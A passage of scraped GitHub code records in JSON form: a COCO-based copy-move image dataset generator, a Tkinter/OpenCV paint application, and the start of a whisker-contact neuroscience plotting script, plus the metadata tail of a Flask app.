"flask.make_response", "line_number": 257, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 261, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 261, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 264, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 265, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 270, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 275, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 275, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 279, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 282, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 289, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 299, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 303, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 305, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 308, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 313, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 313, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 325, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 328, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 331, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 334, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 339, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 343, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 345, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 351, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 355, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 357, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 361, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 365, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 367, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 371, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 376, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 382, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 384, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 388, "usage_type": "call"}]}
+{"seq_id": "40566481823", "text": "#数据及的制作\n\"\"\"\n1: 遍历 annotations keys\n2: 获取图片id\n3: 根据图片id获取改张图片信息\n4: 获取annotations的area数据\n5: 根据面积占比对mask进行筛选,跳过面积占比大于10的mask\n6: 获取segmentation信息\n7: 打开原始图片并裁剪得到mask部分\n 裁剪目标方式,性生成一个只有目标的图片m1\n 对图片以及mask图片进行旋转,缩放,确定上下左右移动位置\n 上下左右移动位置方案:\n\n8: 将原始图片和trans——image图片重叠,得到copy move图片\n9: 生成copy move标签\n10: 将训练图片和标签进行同名分文件及保存\n\"\"\"\nimport json\nimport os\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nfrom crop_test import get_cm_image_mask, get_new_iamge\nfrom utiles import get_annotations, get_id2info_dic\n\n\ndef main():\n source_image_path = '/home/hewaele/Desktop/coco数据集/val2014'\n annotations_path = '/home/hewaele/Desktop/coco数据集/annotations_trainval2014/annotations/instances_val2014.json'\n images_path = '../cmfd_data/images_v2'\n mask_path = '../cmfd_data/mask_v2'\n id2info_path = '../source_data/id2info_dic.json'\n\n count = 0\n id2info_data = get_id2info_dic(id2info_path)\n annotations = get_annotations(annotations_path)\n for pos, annotation in enumerate(annotations[:]):\n image_id = annotation['image_id']\n image_info = id2info_data[str(image_id)]\n annotation_area = annotation['area']\n # print(image_info['file_name'])\n h, w = image_info['height'], image_info['width']\n if 0.0005 <= annotation_area/(h*w) <= 0.1:\n try:\n #获取mask标注信息\n #[x1 y1, x2, y2, x3, y3 ......]\n segmentation = annotation['segmentation'][0]\n image = Image.open(os.path.join(source_image_path, image_info['file_name']))\n image = np.array(image)\n #获得copy move\n trans_image, trans_mask = get_cm_image_mask(image, np.array(segmentation, np.int32).reshape([-1, 2]))\n\n #将原始图片和trans image合并\n new_image = get_new_iamge(image, trans_image, trans_mask)\n # plt.subplot(221)\n # plt.imshow(image)\n # plt.subplot(222)\n # plt.imshow(trans_image)\n # plt.subplot(223)\n # plt.imshow(trans_mask)\n # plt.subplot(224)\n # plt.imshow(new_image)\n # # plt.scatter(segmentation[::2], segmentation[1::2])\n # plt.show()\n # break\n #\n # #将生成的结果图片保存\n save_image = Image.fromarray(new_image)\n save_mask = Image.fromarray(trans_mask)\n save_image.save(os.path.join(images_path, 'image_'+str(count)+'.png'))\n save_mask.save(os.path.join(mask_path, 'mask_'+str(count)+'.png'))\n print(count)\n count += 1\n\n except:\n print('error')\n\n if count >= 150000:\n break\n\n print(count)\n print('done')\nif __name__ == '__main__':\n main()\n\n", "repo_name": "hewaele/creat_copy_move", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utiles.get_id2info_dic", "line_number": 36, "usage_type": "call"}, {"api_name": "utiles.get_annotations", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "crop_test.get_cm_image_mask", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 52, "usage_type": "attribute"}, {"api_name": "crop_test.get_new_iamge", "line_number": 55, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}]}
+{"seq_id": "42548347334", "text": "from tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter.colorchooser import askcolor\r\nfrom PIL import ImageTk, Image,ImageColor\r\nimport numpy as np\r\nimport matplotlib as mp\r\nimport cv2\r\nclass Paint(object):\r\n\r\n DEFAULT_PEN_SIZE = 5.0\r\n DEFAULT_COLOR = 'black'\r\n\r\n def __init__(self):\r\n self.root = Tk()\r\n self.root.title('Paint')\r\n self.root.geometry('1200x800')\r\n self.root.maxsize(1920,1080)\r\n self.root.minsize(500,300)\r\n self.original_image=0\r\n self.edited_image=0\r\n self.filtered_image=0\r\n self.img = PhotoImage('pen.png') \r\n \r\n self.paint_tools = Frame(self.root,width=250,height=600,relief=RIDGE,borderwidth=2)\r\n self.paint_tools.place(x=0,y=0)\r\n\r\n self.upload_logo = ImageTk.PhotoImage(Image.open('pen.png'))\r\n self.p = Label(self.paint_tools, text=\"Upload\",borderwidth=0,font=('verdana',10,'bold'))\r\n self.p.place(x=50,y=15)\r\n self.pen_button = Button(self.paint_tools,padx=6,image=self.upload_logo,borderwidth=2,command=self.upload_action)\r\n self.pen_button.place(x=5,y=10)\r\n\r\n self.brush_logo = ImageTk.PhotoImage(Image.open('brush.png'))\r\n self.b = Label(self.paint_tools,borderwidth=0,text='brush',font=('verdana',10,'bold'))\r\n self.b.place(x=50,y=45)\r\n self.brush_button = Button(self.paint_tools,image = self.brush_logo,borderwidth=2,command=self.draw_action) \r\n self.brush_button.place(x=5,y=40)\r\n\r\n self.color_logo = ImageTk.PhotoImage(Image.open('color.png'))\r\n self.cl = Label(self.paint_tools, text='color',font=('verdana',10,'bold'))\r\n self.cl.place(x=50,y=75)\r\n self.color_button = Button(self.paint_tools,image = self.color_logo,borderwidth=2,command=self.choose_color)\r\n self.color_button.place(x=5,y=70)\r\n\r\n self.eraser_logo = ImageTk.PhotoImage(Image.open('eraser.png'))\r\n self.e = Label(self.paint_tools, text='eraser',font=('verdana',10,'bold'))\r\n self.e.place(x=50,y=105)\r\n self.eraser_button = Button(self.paint_tools,image = self.eraser_logo,borderwidth=2,command=self.erasef)\r\n self.eraser_button.place(x=5,y=100)\r\n \r\n self.rrotate_logo = ImageTk.PhotoImage(Image.open('right.png').resize((30,30)))\r\n self.e = Label(self.paint_tools, text='right rotate',font=('verdana',10,'bold'))\r\n self.e.place(x=50,y=135)\r\n self.eraser_button = Button(self.paint_tools,image = self.rrotate_logo,borderwidth=2,command=self.rotate_right_action)\r\n self.eraser_button.place(x=5,y=130)\r\n \r\n self.rotateleft_logo = ImageTk.PhotoImage(Image.open('left.png').resize((30,30)))\r\n self.rl = Label(self.paint_tools, text='left rotate',font=('verdana',10,'bold'))\r\n self.rl.place(x=50,y=165)\r\n self.rl_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.rotate_left_action)\r\n self.rl_button.place(x=5,y=160)\r\n \r\n self.translate_logo = ImageTk.PhotoImage(Image.open('translate.png').resize((30,30)))\r\n self.translateimg = Label(self.paint_tools, text='Translate',font=('verdana',10,'bold'))\r\n self.translateimg.place(x=50,y=195)\r\n self.translateimg_button = Button(self.paint_tools,image = self.translate_logo,borderwidth=2,command=self.translate)\r\n self.translateimg_button.place(x=5,y=190)\r\n\r\n\r\n self.bigger_logo = ImageTk.PhotoImage(Image.open('bigger.png').resize((30,30)))\r\n self.biggerimg = Label(self.paint_tools, text='Bigger',font=('verdana',10,'bold'))\r\n self.biggerimg.place(x=50,y=225)\r\n self.biggerimg_button = Button(self.paint_tools,image = self.bigger_logo,borderwidth=2,command=self.scale_bigger)\r\n self.biggerimg_button.place(x=5,y=220)\r\n \r\n self.smaller_logo = ImageTk.PhotoImage(Image.open('smaller.png').resize((30,30)))\r\n self.smallerimg = Label(self.paint_tools, text='Smaller',font=('verdana',10,'bold'))\r\n self.smallerimg.place(x=50,y=255)\r\n self.smallerimg_button = Button(self.paint_tools,image = self.smaller_logo,borderwidth=2,command=self.scale_smaller)\r\n self.smallerimg_button.place(x=5,y=250)\r\n\r\n self.skew_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.skewimg = Label(self.paint_tools, text='Skew',font=('verdana',10,'bold'))\r\n self.skewimg.place(x=50,y=285)\r\n self.skewimg_button = Button(self.paint_tools,image = self.skew_logo,borderwidth=2,command=self.skew)\r\n self.skewimg_button.place(x=5,y=280)\r\n \r\n self.save_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.saveimg = Label(self.paint_tools, text='wrapx',font=('verdana',10,'bold'))\r\n self.saveimg.place(x=50,y=315)\r\n self.saveimg_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.wrapx)\r\n self.saveimg_button.place(x=5,y=310)\r\n \r\n self.save_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.saveimg = Label(self.paint_tools, text='wrapy',font=('verdana',10,'bold'))\r\n self.saveimg.place(x=50,y=345)\r\n self.saveimg_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.wrapy)\r\n self.saveimg_button.place(x=5,y=340)\r\n \r\n \r\n self.save_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.saveimg = Label(self.paint_tools, text='save',font=('verdana',10,'bold'))\r\n self.saveimg.place(x=50,y=375)\r\n self.saveimg_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.save_action)\r\n self.saveimg_button.place(x=5,y=370)\r\n \r\n \r\n self.pen_size = Label(self.paint_tools,text=\"Brush Size\",font=('verdana',10,'bold'))\r\n self.pen_size.place(x=15,y=520)\r\n self.choose_size_button = Scale(self.paint_tools, from_=1, to=20, orient=VERTICAL)\r\n self.choose_size_button.place(x=20,y=420)\r\n \r\n\r\n self.c = Canvas(self.root ,height=1000,width=1000)\r\n self.c.place(x=250,y=0)\r\n\r\n self.setup()\r\n self.root.mainloop()\r\n\r\n def setup(self):\r\n self.old_x = None\r\n self.old_y = None\r\n self.c.create_image(100,100,anchor=NW,image=self.img)\r\n self.c.image = self.img \r\n self.line_width = self.choose_size_button.get()\r\n self.color_code = self.DEFAULT_COLOR\r\n self.erase = False\r\n self.active_button = self.brush_button\r\n \r\n # self.c.bind('', self.paint)\r\n # self.c.bind('', self.reset)\r\n\r\n # def use_pen(self):\r\n # self.activate_button(self.pen_button)\r\n\r\n # def use_brush(self):\r\n # self.activate_button(self.brush_button)\r\n\r\n # def choose_color(self):\r\n # self.eraser_on = False\r\n # self.color = askcolor(color=self.color)[1]\r\n\r\n # de f use_eraser(self):\r\n # self.activate_button(self.eraser_button, eraser_mode=True)\r\n\r\n # def activate_button(self, some_button, eraser_mode=False):\r\n # self.active_button.config(relief=RAISED)\r\n # some_button.config(relief=SUNKEN)\r\n # self.active_button = some_button\r\n # self.eraser_on = eraser_mode\r\n\r\n # def paint(self, event):\r\n # self.line_width = self.choose_size_button.get()\r\n # paint_color = 'white' if self.eraser_on else self.color\r\n # if self.old_x and self.old_y:\r\n # self.c.create_line(self.old_x, self.old_y, event.x, event.y,\r\n # width=self.line_width, fill=paint_color,\r\n # capstyle=ROUND, smooth=TRUE, splinesteps=36)\r\n # self.old_x = event.x\r\n # self.old_y = event.y\r\n def erasef(self):\r\n self.erase=True\r\n \r\n def draw_action(self):\r\n self.c.bind(\"\", self.start_draw)\r\n self.c.bind(\"\", self.draw)\r\n\r\n def choose_color(self):\r\n self.color_code = askcolor(color=self.color_code)[1]\r\n\r\n def start_draw(self, event):\r\n self.x = event.x\r\n self.y = event.y\r\n self.draw_ids = []\r\n \r\n \r\n def draw(self, event):\r\n # print(self.draw_ids)\r\n if self.erase:\r\n self.line_width = self.choose_size_button.get()\r\n self.draw_ids.append(self.c.create_line(self.x, self.y, event.x, event.y, width=self.line_width,\r\n fill='#ffffff', capstyle=ROUND, smooth=True))\r\n cv2.line(self.filtered_image, (int(self.x * self.ratio), int(self.y * self.ratio)),\r\n (int(event.x * self.ratio), int(event.y * self.ratio)),\r\n (255,255,255) , thickness=self.line_width,\r\n lineType=8)\r\n self.x = event.x\r\n self.y = event.y\r\n else:\r\n self.line_width = self.choose_size_button.get()\r\n self.draw_ids.append(self.c.create_line(self.x, self.y, event.x, event.y, width=self.line_width,\r\n fill=self.color_code, capstyle=ROUND, smooth=True))\r\n RGB = ImageColor.getcolor(self.color_code,'RGB')\r\n R= RGB[0]\r\n G= RGB[1]\r\n B= RGB[2]\r\n cv2.line(self.filtered_image, (int(self.x * self.ratio), int(self.y * self.ratio)),\r\n (int(event.x * self.ratio), int(event.y * self.ratio)),\r\n (B,G,R) , thickness=self.line_width,\r\n lineType=8)\r\n self.x = event.x\r\n self.y = event.y\r\n \r\n # def refresh_side_frame(self):\r\n # try:\r\n # self.side_frame.grid_forget()\r\n # except:\r\n # pass\r\n # self.c.unbind(\"\")\r\n # self.c.unbind(\"\")\r\n # self.c.unbind(\"\")\r\n # self.display_image(self.filtered_image)\r\n # self.side_frame = self.brush_button.Frame(self.frame_menu)\r\n # self.side_frame.grid(row=0, column=4, rowspan=10)\r\n # self.side_frame.config(relief=GROOVE, padding=(50, 15))\r\n \r\n \r\n def upload_action(self):\r\n self.c.delete(\"all\")\r\n self.filename = filedialog.askopenfilename()\r\n self.original_image = cv2.imread(self.filename)\r\n self.edited_image = cv2.imread(self.filename)\r\n self.filtered_image = cv2.imread(self.filename)\r\n self.display_image(self.edited_image)\r\n \r\n \r\n def rotate_left_action(self):\r\n self.filtered_image = cv2.rotate(\r\n self.filtered_image, cv2.ROTATE_90_COUNTERCLOCKWISE)\r\n self.display_image(self.filtered_image)\r\n\r\n\r\n def rotate_right_action(self):\r\n self.filtered_image = cv2.rotate(\r\n self.filtered_image, cv2.ROTATE_90_CLOCKWISE)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def scale_smaller(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 0.8, fy = 0.8)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def wrapx(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 1.2, fy = 1)\r\n self.display_image(self.filtered_image)\r\n \r\n def wrapy(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 1, fy = 1.2)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n \r\n \r\n def scale_bigger(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 1.2, fy = 1.2)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def translate(self):\r\n \r\n height, width = self.filtered_image.shape[:2]\r\n quarter_height, quarter_width = height / 4, width / 4\r\n T = np.float32([[1, 0, quarter_width], [0, 1, quarter_height]])\r\n self.filtered_image = cv2.warpAffine(self.filtered_image, T, (width, height))\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def skew(self):\r\n rows, cols,c= self.filtered_image.shape\r\n M = np.float32([[1, 0.5, 0],\r\n \t[0, 1 , 0],\r\n \t[0, 0 , 1]]) \r\n self.filtered_image = cv2.warpPerspective(self.filtered_image,M,(int(cols*1.5),int(rows*1.5)))\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def display_image(self, image=None):\r\n self.c.delete(\"all\")\r\n if image is None:\r\n image = self.edited_image.copy()\r\n else:\r\n image = image\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n height, width , channel = image.shape\r\n ratio = height / width\r\n\r\n new_width = width\r\n new_height = height\r\n\r\n # if height > 400 or width > 300:\r\n # if ratio < 1:\r\n # new_width = 300\r\n # new_height = int(new_width * ratio)\r\n # else:\r\n # new_height = 400\r\n # new_width = int(new_height * (width / height))\r\n\r\n self.ratio = height / new_height\r\n self.new_image = cv2.resize(image, (new_width, new_height))\r\n\r\n self.new_image = ImageTk.PhotoImage(\r\n Image.fromarray(self.new_image))\r\n\r\n self.c.config(width=new_width, height=new_height)\r\n self.c.create_image(\r\n new_width / 2, new_height / 2, image=self.new_image)\r\n \r\n def save_action(self):\r\n original_file_type = self.filename.split('.')[-1]\r\n filename = filedialog.asksaveasfilename()\r\n filename = filename + \".\" + original_file_type\r\n\r\n save_as_image = self.filtered_image\r\n cv2.imwrite(filename, save_as_image)\r\n self.filename = filename\r\n \r\n # def reset(self, event):\r\n # self.old_x, self.old_y = None, None\r\n\r\nPaint()", "repo_name": "Ribal-Dahdal/Paint-App", "sub_path": "paint.py", "file_name": "paint.py", "file_ext": "py", "file_size_in_byte": 14276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.ImageTk.PhotoImage", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 27, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 27, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 33, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 33, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 39, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 39, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 45, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 45, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 51, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 51, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 63, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 70, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 76, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 76, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 82, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 82, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 82, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 82, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 94, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 94, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 94, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 94, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 101, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 101, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 101, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 101, "usage_type": "name"}, {"api_name": "tkinter.colorchooser.askcolor", "line_number": 169, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 183, "usage_type": "call"}, {"api_name": "PIL.ImageColor.getcolor", "line_number": 193, "usage_type": "call"}, {"api_name": "PIL.ImageColor", "line_number": 193, "usage_type": "name"}, {"api_name": "cv2.line", "line_number": 197, "usage_type": "call"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 220, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 220, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 221, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 222, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 223, "usage_type": "call"}, {"api_name": "cv2.rotate", "line_number": 228, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_COUNTERCLOCKWISE", "line_number": 229, "usage_type": "attribute"}, {"api_name": "cv2.rotate", "line_number": 234, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_CLOCKWISE", "line_number": 235, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 241, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 247, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 268, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 275, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 278, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 288, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 288, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 304, "usage_type": "call"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 306, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 306, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 307, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 307, "usage_type": "name"}, {"api_name": "tkinter.filedialog.asksaveasfilename", "line_number": 315, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 315, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 319, "usage_type": "call"}]}
+{"seq_id": "71343659047", "text": "## Heatmap the contacts and anti-contacts in the warped plot by their evidence\n\n# Uses data:\n# big_weights_part\n# reduced_model_results_sbrc/no_opto/contact_binarized+anti_contact_count+angle+anti_angle_max\n\n\n\"\"\"\n4A, bottom; S4A, bottom\n PLOT_EDGE_SUMMARY_ONLY\n Image of the different shape positions in the consensus space\n\n4B\n PLOT_OCCUPANCY_DISCONLY\n Locations of whisks with contact and whisks without contact\n\n4C; S4B\n PLOT_EVIDENCE_DISCONLY_REWSIDEONLY\n Evidence for stimulus in both whisks with and without contact\n\nS4C\n PLOT_EVIDENCE_DISCONLY_CHOICEONLY\n Evidence for choice in both whisks with and without contact\n\"\"\"\n\nimport json\nimport os\nimport pandas\nimport numpy as np\nimport my.plot \nimport matplotlib.pyplot as plt\nimport matplotlib\nimport extras\n\n\n## Plot flags\nmy.plot.manuscript_defaults()\nmy.plot.font_embed()\n\n\n## Parameters\nwith open('../parameters') as fi:\n params = json.load(fi)\n \n \n## Load metadata about sessions\nsession_df, task2mouse, mouse2task = my.dataload.load_session_metadata(params)\nbig_tm = pandas.read_pickle(os.path.join(params['patterns_dir'], 'big_tm'))\n\n# Insert mouse and task levels into big_tm\nbig_tm = my.misc.insert_mouse_and_task_levels(\n big_tm, mouse2task, level=0, sort=True)\n\n# Count the number of trials per session\nn_trials_per_session = big_tm.groupby(['task', 'mouse', 'session']).size()\n\n# Count the number of trials per mouse\nn_trials_per_mouse = n_trials_per_session.sum(level=['task', 'mouse'])\n\n\n## Load warping data\ntransformation_df = pandas.read_pickle(\n os.path.join(params['scaling_dir'], 'transformation_df'))\nconsensus_edge_summary = pandas.read_pickle(\n os.path.join(params['scaling_dir'], 'consensus_edge_summary'))\n\n# ces to plot\ncv_ces = consensus_edge_summary.xs(50, level='stepper_pos').max(level='row')\ncc_ces = consensus_edge_summary.xs(150, level='stepper_pos').max(level='row')\nall_ces = consensus_edge_summary.max(level='row')\n\n# fillna for transparent plotting\ncv_ces[cv_ces == 0] = np.nan\ncc_ces[cc_ces == 0] = np.nan\nall_ces[all_ces == 0] = np.nan\n\n\n## Load data\nC2_whisk_cycles = pandas.read_pickle(\n os.path.join(params['patterns_dir'], 'big_C2_tip_whisk_cycles'))\nbig_cycle_features = pandas.read_pickle(\n os.path.join(params['patterns_dir'], 'big_cycle_features'))\n\n# This is just to plot follicle position\nmean_follicle = pandas.read_pickle(\n os.path.join(params['patterns_dir'], 'mean_follicle'))\n\n# Transform follicle\ntransformed_mean_follicle = my.misc.transform(\n mean_follicle, transformation_df).mean(level='whisker')\n\n\n## Load the original features for plotting\n# Need the original bins ('analysis_bin') to interpret the weights\nouf = pandas.read_pickle(os.path.join(params['logreg_dir'], \n 'obliviated_unaggregated_features_with_bin'))\n\n# Insert mouse and task levels into features\nouf = my.misc.insert_mouse_and_task_levels(\n ouf, mouse2task, level=0, sort=True)\n\n# Add a new bin for this analysis\nbin_edges_frames = np.linspace(-300, 100, 5)\nbin_centers_frames = (bin_edges_frames[1:] + bin_edges_frames[:-1]) / 2.0\nbin_ser = pandas.cut(\n C2_whisk_cycles['peak_frame_wrt_rwin'],\n bin_edges_frames, labels=False, right=True).rename('bin')\n\n# Append bin_ser to index\nidxdf = ouf.index.to_frame().reset_index(drop=True)\nidxdf = idxdf.join(bin_ser, on=['session', 'trial', 'cycle'])\nidxdf['bin'] = idxdf['bin'].fillna(-1).astype(np.int)\nouf.index = pandas.MultiIndex.from_frame(idxdf)\n\n# Drop null bins and reorder levels\nouf = ouf.drop(-1, level='bin')\nouf = ouf.reorder_levels(\n ['task', 'mouse', 'session', 'trial', 'bin', 'analysis_bin', 'cycle']\n ).sort_index()\n\n# Extract features of interest\ncontact_binarized = ouf['contact_binarized']\nanti_contact_count = ouf['anti_contact_count']\n\n\n## Load results of main2a1\nbig_weights_part = pandas.read_pickle('big_weights_part')\n\n# Choose the reduced_model\nreduced_model = 'contact_binarized+anti_contact_count+angle+anti_angle_max'\n\n# Use these weights\nuse_weights = big_weights_part[False]['no_opto'][reduced_model]\n\n# normalizing stuff for features that aren't raw\nnormalizing_mu = pandas.read_pickle(os.path.join(\n params['logreg_dir'], 'reduced_model_results_sbrc', 'no_opto', reduced_model, \n 'big_normalizing_mu'))\nnormalizing_sigma = 